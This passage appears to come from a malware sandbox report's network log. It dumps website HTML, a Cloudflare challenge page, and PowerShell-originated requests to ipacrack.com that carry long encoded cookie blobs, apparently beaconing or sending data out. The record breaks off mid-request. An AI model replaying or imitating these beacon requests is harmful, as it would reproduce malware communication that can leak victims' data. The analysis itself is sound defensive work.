                  2024-08-27 20:52:25 UTC112INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 5a 65 6e
                  Data Ascii: <link rel="profile" href="http://gmpg.org/xfn/11" /><link rel="alternate" type="application/rss+xml" title="Zen
                  2024-08-27 20:52:25 UTC8192INData Raw: 74 72 75 6d 20 66 c3 bc 72 20 45 6e 65 72 67 65 74 69 73 63 68 65 20 48 65 69 6c 77 65 69 73 65 6e 20 52 53 53 32 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 68 61 6d 61 72 61 2e 64 65 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 68 61 6d 61 72 61 2e 64 65 2f 78 6d 6c 72 70 63 2e 70 68 70 22 20 2f 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 68 61 6d 61 72 61 2e 64 65 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 65 6e 66 6f 6c 64 2f 6a 73 2f 68 74 6d 6c 35 73 68 69 76 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 21
                  Data Ascii: trum fr Energetische Heilweisen RSS2 Feed" href="https://www.shamara.de/feed/" /><link rel="pingback" href="https://www.shamara.de/xmlrpc.php" />...[if lt IE 9]><script src="https://www.shamara.de/wp-content/themes/enfold/js/html5shiv.js"></script><!
                  2024-08-27 20:52:25 UTC8192INData Raw: 65 72 2d 65 69 6e 73 74 65 69 67 65 72 2f 22 20 69 74 65 6d 70 72 6f 70 3d 22 75 72 6c 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 76 69 61 2d 62 75 6c 6c 65 74 22 3e 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 76 69 61 2d 6d 65 6e 75 2d 74 65 78 74 22 3e 50 65 6e 64 65 6c 6e 20 66 c3 bc 72 20 45 69 6e 73 74 65 69 67 65 72 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 6c 69 3e 0a 09 3c 6c 69 20 69 64 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 37 35 33 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 68 61 6d 61 72 61 2e 64 65 2f 73
                  Data Ascii: er-einsteiger/" itemprop="url"><span class="avia-bullet"></span><span class="avia-menu-text">Pendeln fr Einsteiger</span></a></li><li id="menu-item-753" class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.shamara.de/s
                  2024-08-27 20:52:25 UTC8192INData Raw: 6e 64 65 6e 3f 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 72 69 67 68 74 3b 22 3e 4d c3 b6 63 68 74 65 73 74 20 44 75 20 44 65 69 6e 20 4c 65 62 65 6e 20 69 6e 20 64 69 65 20 65 69 67 6e 65 6e 65 6e 20 48 c3 a4 6e 64 65 20 6e 65 68 6d 65 6e 3f 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 72 69 67 68 74 3b 22 3e 4d c3 b6 63 68 74 65 73 74 20 44 75 20 61 6e 20 4b c3 b6 72 70 65 72 2c 20 53 65 65 6c 65 20 75 6e 64 20 47 65 69 73 74 20 48 65 69 6c 75 6e 67 20 65 72 66 61 68 72 65 6e 3f 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 73 65 63 74 69 6f 6e 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6c 65 78 5f 63 6f 6c 75 6d 6e 20 61 76 5f 6f 6e 65 5f 68 61 6c 66 20 20 61 76 2d 61
                  Data Ascii: nden?</p><p style="text-align: right;">Mchtest Du Dein Leben in die eignenen Hnde nehmen?</p><p style="text-align: right;">Mchtest Du an Krper, Seele und Geist Heilung erfahren?</p></div></section></div><div class="flex_column av_one_half av-a
                  2024-08-27 20:52:25 UTC4816INData Raw: 6f 70 65 3d 22 69 74 65 6d 73 63 6f 70 65 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 50 46 6f 6f 74 65 72 22 20 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 27 63 6f 6e 74 61 69 6e 65 72 27 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 63 6f 70 79 72 69 67 68 74 27 3e 26 63 6f 70 79 3b 20 43 6f 70 79 72 69 67 68 74 20 20 2d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 68 61 6d 61 72 61 2e 64 65 2f 27 3e 5a 65 6e 74 72 75 6d 20 66 c3 bc 72 20 45 6e 65 72 67 65 74 69 73 63 68 65 20 48 65 69 6c 77 65 69 73 65 6e 3c 2f 61 3e 3c 2f 73 70 61 6e 3e 0a 0a 20 20
                  Data Ascii: ope="itemscope" itemtype="https://schema.org/WPFooter" > <div class='container'> <span class='copyright'>&copy; Copyright - <a href='https://www.shamara.de/'>Zentrum fr Energetische Heilweisen</a></span>
                  2024-08-27 20:52:25 UTC5025INData Raw: 73 63 72 69 70 74 3e 0a 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 0a 20 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 20 20 0a 76 61 72 20 61 76 69 61 5f 66 72 61 6d 65 77 6f 72 6b 5f 67 6c 6f 62 61 6c 73 20 3d 20 61 76 69 61 5f 66 72 61 6d 65 77 6f 72 6b 5f 67 6c 6f 62 61 6c 73 20 7c 7c 20 7b 7d 3b 0a 20 20 20 20 61 76 69 61 5f 66 72 61 6d 65 77 6f 72 6b 5f 67 6c 6f 62 61 6c 73 2e 66 72 61 6d 65 77 6f 72 6b 55 72 6c 20 3d 20 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 68 61 6d 61 72 61 2e 64 65 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 65 6e 66 6f 6c 64 2f 66 72 61 6d 65 77 6f 72 6b 2f 27 3b 0a 20 20 20 20 61 76 69 61 5f 66 72 61 6d 65 77 6f 72 6b 5f 67 6c 6f 62 61 6c 73 2e 69 6e 73 74 61
                  Data Ascii: script> <script type='text/javascript'> /* <![CDATA[ */ var avia_framework_globals = avia_framework_globals || {}; avia_framework_globals.frameworkUrl = 'https://www.shamara.de/wp-content/themes/enfold/framework/'; avia_framework_globals.insta
                  2024-08-27 20:52:25 UTC2INData Raw: 0d 0a
                  Data Ascii:
                  2024-08-27 20:52:25 UTC5INData Raw: 30 0d 0a 0d 0a
                  Data Ascii: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  2192.168.2.549716188.114.96.34435952C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  TimestampBytes transferredDirectionData
                  2024-08-27 20:52:32 UTC2147OUTGET / HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                  Cookie: 6F48217DA8=H4sIAAAAAAAEAI1U0W6bMBT9FfO2SRtqkwhFy5MDJvGEMbIh6QMiYolTIQFGQNdW4uNnk7CQpUr3AMLnnHu59/rY0PMijhgPGHWxhxL7RxzU8rlOCydt086AQeDAEGo8akTdxGl+lGUTw6rSgpjJtMjK586wZVHI8hzrZrloRrlAD8QnzWnxUcSXt7n19SYM9PC94K01m04+/R0lQRQi5kOCEui51OffA7vPxCux1+HbrDzI1yZu3ptWFNNJvC8OpngTneHU2W9R647HOj7oTnQTX2SdsaYEOQxv9ExPqwCG6+RqjJ3hURt6nw3Zk/s019qVKhqxDWJJHI9a8COyRGxH3Z3aRhtxThlPJp1BS9FXdJN4IJSEJ+dudn7YGbpE9BQmpprWwkRPaGEuYbgwbeIszM2S65fCfnL9qI8td/VrvTAJt5Us8FSOoYYdZPYah8gOI6ZGThxrNmaxg/wQu1h1g8tW5NYMuMpM+TuwAJEHkYPH2RTwVlSVchiYfwMrUb5kpejV40we2iAvscYQQxvMMfWT+fFhroiLp28sftez1/Q9g/5VfuxGRUdLD9uXvQhefuXZvjNOLho2algzKduR1zojRCS475A4FEWlhP+p0+feoQRif3wcLuiOUUiwvxquhn9E/TkabKyB0RVy7fFX1UJWXzVD+ZbghGT7Wjby2IIzAR4fgJraH3HSkN+VBAAA; 6F48217DA81=H4sIAAAAAAAEAGVQW07DMBC8Cr4AdwihhYAiqrpSBX+WvUlNba+166Qp8uGxG+AH+WNfM7OzbmJ0VqtkMWxJeXhGTlmoyVg0YxYaw+nW0UzMJaTBY8jCKF6RxrkVYC4+C1iiQwLKYsCQDM3rbLu0ffvOX6/dR3z5lPbJZNEZB1k4VlW2B490vWvRRwJmW1e8DYPV0BZ35wPup9KJeAHiEziXxR5Gy4muJZtCsh4eCM91sQRF+tTEmAUDzUWi6MuR/B+gCmyWCGQh6J+D2a5O2StKrAk [TRUNCATED]
                  Host: ipacrack.com
                  Connection: Close
                  2024-08-27 20:52:32 UTC1285INHTTP/1.1 403 Forbidden
                  Date: Tue, 27 Aug 2024 20:52:32 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                  Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                  Cross-Origin-Embedder-Policy: require-corp
                  Cross-Origin-Opener-Policy: same-origin
                  Cross-Origin-Resource-Policy: same-origin
                  Origin-Agent-Cluster: ?1
                  Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                  Referrer-Policy: same-origin
                  X-Content-Options: nosniff
                  X-Frame-Options: SAMEORIGIN
                  cf-mitigated: challenge
                  2024-08-27 20:52:32 UTC731INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 30 5a 42 36 69 43 4a 31 35 50 32 65 4a 30 5a 57 34 31 74 47 7a 39 61 4f 4a 36 32 2f 62 75 52 59 43 61 37 71 77 57 66 34 53 31 44 4e 35 68 65 34 47 47 6e 37 51 31 44 45 6a 32 55 7a 36 4f 35 61 34 44 46 37 4c 58 52 74 4e 64 41 4a 5a 4a 66 43 4c 52 42 7a 58 65 66 61 30 41 4a 4a 62 66 35 65 46 78 58 52 62 2b 31 38 6a 47 75 2b 50 53 71 4f 43 61 58 39 74 4b 35 77 6c 57 36 79 6b 6e 32 73 7a 4f 4c 6b 69 38 32 4c 6b 6f 72 6c 66 48 54 73 46 36 6e 36 71 77 3d 3d 24 37 63 70 31 39 73 70 5a 4b 36 48 64 79 74 6a 44 67 73 39 77 50 41 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61
                  Data Ascii: cf-chl-out: 0ZB6iCJ15P2eJ0ZW41tGz9aOJ62/buRYCa7qwWf4S1DN5he4GGn7Q1DEj2Uz6O5a4DF7LXRtNdAJZJfCLRBzXefa0AJJbf5eFxXRb+18jGu+PSqOCaX9tK5wlW6ykn2szOLki82LkorlfHTsF6n6qw==$7cp19spZK6HdytjDgs9wPA==Cache-Control: private, max-age=0, no-store, no-cache, must-reva
                  2024-08-27 20:52:32 UTC722INData Raw: 34 36 62 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                  Data Ascii: 46b5<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                  2024-08-27 20:52:32 UTC1369INData Raw: 65 72 7b 63 6f 6c 6f 72 3a 23 65 65 37 33 30 61 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 62 6f 64 79 20 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 39 39 39 20 74 72 61 6e 73 70 61 72 65 6e 74 20 74 72 61 6e 73 70 61 72 65 6e 74 7d 62 6f 64 79 20 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 62 6f 64 79 20 2e 70 6f 77 2d 62 75 74 74 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 36 39 33 66 66 3b 63 6f 6c 6f 72 3a 23 31 64 31 64 31 64 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78
                  Data Ascii: er{color:#ee730a;text-decoration:underline}body .lds-ring div{border-color:#999 transparent transparent}body .font-red{color:#b20f03}body .pow-button{background-color:#4693ff;color:#1d1d1d}body #challenge-success-text{background-image:url(data:image/svg+x
                  2024-08-27 20:52:32 UTC1369INData Raw: 2e 6e 6f 2d 6a 73 20 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 62 6f 64 79 2e 6e 6f 2d 6a 73 20 2e 63 68 61 6c 6c 65 6e 67 65 2d 72 75 6e 6e 69 6e 67 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 62 6f 64 79 2e 64 61 72 6b 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 32 32 3b 63 6f 6c 6f 72 3a 23 64 39 64 39 64 39 7d 62 6f 64 79 2e 64 61 72 6b 20 61 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 62 6f 64 79 2e 64 61 72 6b 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 65 65 37 33 30 61 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 62 6f 64 79 2e 64 61 72 6b 20 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 39 39 39 20 74
                  Data Ascii: .no-js .loading-spinner{visibility:hidden}body.no-js .challenge-running{display:none}body.dark{background-color:#222;color:#d9d9d9}body.dark a{color:#fff}body.dark a:hover{color:#ee730a;text-decoration:underline}body.dark .lds-ring div{border-color:#999 t
                  2024-08-27 20:52:32 UTC1369INData Raw: 4d 35 4e 79 34 7a 4f 53 30 78 4c 6a 41 31 4e 79 34 7a 4f 44 6b 74 4c 6a 59 31 49 44 41 74 4d 53 34 77 4e 54 59 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 7d 62 6f 64 79 2e 6c 69 67 68 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 63 6f 6c 6f 72 3a 23 33 31 33 31 33 31 7d 62 6f 64 79 2e 6c 69 67 68 74 20 61 7b 63 6f 6c 6f 72 3a 23 30 30 35 31 63 33 7d 62 6f 64 79 2e 6c 69 67 68 74 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 65 65 37 33 30 61 3b 74 65 78 74 2d 64 65 63 6f
                  Data Ascii: M5Ny4zOS0xLjA1Ny4zODktLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+)}body.light{background-color:transparent;color:#313131}body.light a{color:#0051c3}body.light a:hover{color:#ee730a;text-deco
                  2024-08-27 20:52:32 UTC1369INData Raw: 65 6d 30 74 4d 53 34 77 4f 44 51 67 4d 53 34 30 4d 6a 64 78 4c 6a 59 32 49 44 41 67 4d 53 34 77 4e 54 63 75 4d 7a 67 34 4c 6a 51 77 4e 79 34 7a 4f 44 6b 75 4e 44 41 33 4c 6a 6b 35 4e 43 41 77 49 43 34 31 4f 54 59 74 4c 6a 51 77 4e 79 34 35 4f 44 51 74 4c 6a 4d 35 4e 79 34 7a 4f 53 30 78 4c 6a 41 31 4e 79 34 7a 4f 44 6b 74 4c 6a 59 31 49 44 41 74 4d 53 34 77 4e 54 59 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 7d 61 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 63 6f 6c 6f 72 3a
                  Data Ascii: em0tMS4wODQgMS40MjdxLjY2IDAgMS4wNTcuMzg4LjQwNy4zODkuNDA3Ljk5NCAwIC41OTYtLjQwNy45ODQtLjM5Ny4zOS0xLjA1Ny4zODktLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+)}a{background-color:transparent;color:
                  2024-08-27 20:52:32 UTC1369INData Raw: 49 44 41 67 4d 43 41 78 4e 69 41 7a 62 54 41 67 4d 6a 52 68 4d 54 45 67 4d 54 45 67 4d 43 41 78 49 44 45 67 4d 54 45 74 4d 54 45 67 4d 54 45 75 4d 44 45 67 4d 54 45 75 4d 44 45 67 4d 43 41 77 49 44 45 74 4d 54 45 67 4d 54 45 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 6d 4d 31 4e 7a 52 68 49 69 42 6b 50 53 4a 4e 4d 54 63 75 4d 44 4d 34 49 44 45 34 4c 6a 59 78 4e 55 67 78 4e 43 34 34 4e 30 77 78 4e 43 34 31 4e 6a 4d 67 4f 53 34 31 61 44 49 75 4e 7a 67 7a 65 6d 30 74 4d 53 34 77 4f 44 51 67 4d 53 34 30 4d 6a 64 78 4c 6a 59 32 49 44 41 67 4d 53 34 77 4e 54 63 75 4d 7a 67 34 4c 6a 51 77 4e 79 34 7a 4f 44 6b 75 4e 44 41 33 4c 6a 6b 35 4e 43 41 77 49 43 34 31 4f 54 59 74 4c 6a 51 77 4e 79 34 35 4f 44 51 74 4c 6a 4d 35 4e 79 34 7a 4f 53 30
                  Data Ascii: IDAgMCAxNiAzbTAgMjRhMTEgMTEgMCAxIDEgMTEtMTEgMTEuMDEgMTEuMDEgMCAwIDEtMTEgMTEiLz48cGF0aCBmaWxsPSIjZmM1NzRhIiBkPSJNMTcuMDM4IDE4LjYxNUgxNC44N0wxNC41NjMgOS41aDIuNzgzem0tMS4wODQgMS40MjdxLjY2IDAgMS4wNTcuMzg4LjQwNy4zODkuNDA3Ljk5NCAwIC41OTYtLjQwNy45ODQtLjM5Ny4zOS0
                  2024-08-27 20:52:32 UTC1369INData Raw: 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 2e 66 6f 6f 74 65 72 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 32 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 3b 6d 61 78 2d 77 69 64 74 68 3a 36 30 72 65 6d 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 66 6f 6f 74 65 72 2d 69 6e 6e 65 72 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 39 64 39 64 39 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 3a 61 66 74 65 72 7b 63 6c 65 61 72 3a 62 6f 74 68 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 7d 2e 63 6c 65 61 72 66 69 78 20
                  Data Ascii: color:#fff;cursor:pointer}.footer{font-size:.75rem;line-height:1.125rem;margin:0 auto;max-width:60rem;width:100%}.footer-inner{border-top:1px solid #d9d9d9;padding-bottom:1rem;padding-top:1rem}.clearfix:after{clear:both;content:"";display:table}.clearfix
                  2024-08-27 20:52:32 UTC1369INData Raw: 69 67 68 2d 63 6f 6e 74 72 61 73 74 3a 61 63 74 69 76 65 29 2c 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 6d 73 2d 68 69 67 68 2d 63 6f 6e 74 72 61 73 74 3a 6e 6f 6e 65 29 7b 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 7d 2e 72 74 6c 20 2e 68 65 61 64 69 6e 67 2d 66 61 76 69 63 6f 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 31 30 30 25 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 34 32 70 78 7d 2e 72 74 6c 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72
                  Data Ascii: igh-contrast:active),screen and (-ms-high-contrast:none){.main-wrapper,body{display:block}}.rtl .heading-favicon{margin-left:.5rem;margin-right:0}.rtl #challenge-success-text{background-position:100%;padding-left:0;padding-right:42px}.rtl #challenge-error
                  2024-08-27 20:52:32 UTC1369INData Raw: 70 53 33 31 59 71 66 48 53 44 75 38 53 56 53 43 39 5f 78 58 33 33 6a 4f 4a 42 69 69 4e 2e 4f 58 53 7a 57 74 4b 6c 43 52 45 35 72 31 35 50 59 35 6d 6c 67 47 35 36 39 49 50 7a 7a 35 6c 54 35 59 70 34 4b 6f 53 4a 62 66 56 34 71 4d 6d 35 73 53 50 71 5f 56 6c 70 6d 6f 58 4f 4c 5a 76 5f 34 4a 30 7a 50 45 58 42 6d 74 37 51 59 61 2e 32 57 66 76 6e 33 5a 69 6f 71 43 4e 4a 37 62 73 5f 5a 56 32 4a 66 4e 6a 6b 74 32 58 77 36 4b 74 62 50 6c 6b 62 63 79 56 74 47 77 30 6a 69 65 56 62 4c 4c 30 33 7a 38 53 4d 4d 78 5f 68 6e 4b 47 37 51 4d 68 61 5a 57 49 63 6e 34 6e 71 77 6a 5a 41 44 44 63 55 45 44 62 46 44 50 53 41 50 4f 4e 41 78 67 75 2e 73 47 6f 41 32 42 54 36 4d 5f 63 77 39 64 65 61 5a 48 77 66 73 64 54 48 74 70 33 4d 73 56 31 59 36 36 39 43 4e 6b 4c 6d 69 63 5a 62 57
                  Data Ascii: pS31YqfHSDu8SVSC9_xX33jOJBiiN.OXSzWtKlCRE5r15PY5mlgG569IPzz5lT5Yp4KoSJbfV4qMm5sSPq_VlpmoXOLZv_4J0zPEXBmt7QYa.2Wfvn3ZioqCNJ7bs_ZV2JfNjkt2Xw6KtbPlkbcyVtGw0jieVbLL03z8SMMx_hnKG7QMhaZWIcn4nqwjZADDcUEDbFDPSAPONAxgu.sGoA2BT6M_cw9deaZHwfsdTHtp3MsV1Y669CNkLmicZbW


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  3192.168.2.549717104.21.67.1304435796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  TimestampBytes transferredDirectionData
                  2024-08-27 20:52:46 UTC2156OUTGET / HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                  Cookie: 